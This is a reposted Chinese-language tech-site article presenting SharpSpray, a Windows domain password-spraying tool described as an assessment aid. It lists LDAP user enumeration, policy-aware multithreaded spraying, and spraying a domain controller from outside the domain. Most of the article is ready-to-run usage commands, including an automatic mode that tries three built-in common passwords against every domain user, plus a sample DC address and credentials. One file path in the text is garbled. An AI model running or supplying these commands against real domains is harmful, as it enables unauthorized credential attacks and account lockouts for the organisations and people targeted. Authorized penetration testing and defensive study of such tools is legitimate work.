一款域内密码喷射评估工具

电子说

1.3w人已加入

描述

SharpSpray

这是一个域内的密码喷射评估工具,能通过ldap收集用户名,并根据密码设置策略进行自动域内的密码喷射评估。SharpSpray是对SharpHose项目进行改造实现的,解决了原项目中无法在域外爆破、无法进行批量密码爆破等问题,并内置了三个域内高频率口令。

特点

  • 通过LDAP自动查找用户来进行喷射

  • 根据密码策略自动a喷射

  • 多线程喷射,速度较快

  • 能在域外对域控进行喷射

使用

Examples:
Domain Joined Spray: SharpSpray.exe --action SPRAY_USERS --spraypassword Aa123456789.
Domain Joined Spray w/ Exclusions: SharpSpray.exe --action SPRAY_USERS --auto
Domain Joined Spray w/ Exclusions: SharpSpray.exe --action SPRAY_USERS --passfile c:	est.txt
Non-Domain Joined Spray: SharpSpray.exe  --dc-ip 172.16.178.9 --domain windows.local --username test --password Aa123456789. --action SPRAY_USERS --spraypassword Aa123456789.
Domain Joined Show Policies: SharpSpray.exe --action GET_POLICIES
Domain Joined Show Policy Users: SharpSpray.exe --action GET_POLICY_USERS --policy windows
Domain Joined Show All Users: SharpSpray.exe --action GET_ENABLED_USERS

策略发现

在使用之前可以先通过GET_POLICIES来获取当前密码策略和域内总用户数,避免用户数目过大导致服务器崩溃。

SharpSpray.exe --action GET_POLICIES

服务器

密码喷射(三种喷射模式)

SharpSpray.exe --action SPRAY_USERS --spraypassword Aa123456789.只爆破一个密码SharpSpray.exe --action SPRAY_USERS --auto 此命令会自动爆破域内所有用户的1234qwer!@#$、1qaz@WSX1qaz、QAZwsxEDC这三个高频密码。SharpSpray.exe --action SPRAY_USERS --passfile c: est.txt爆破一个密码本

服务器

域外对域控进行密码喷射
SharpSpray.exe --dc-ip 172.16.178.9 --domain windows.local --username test --password Aa123456789. --action SPRAY_USERS --spraypassword Aa123456789.

TODO

  • 域外的用户名爆破
  • 域内信息收集

审核编辑 :李倩


打开APP阅读更多精彩内容
声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉

全部0条评论

快来发表一下你的评论吧 !

×
20
完善资料,
赚取积分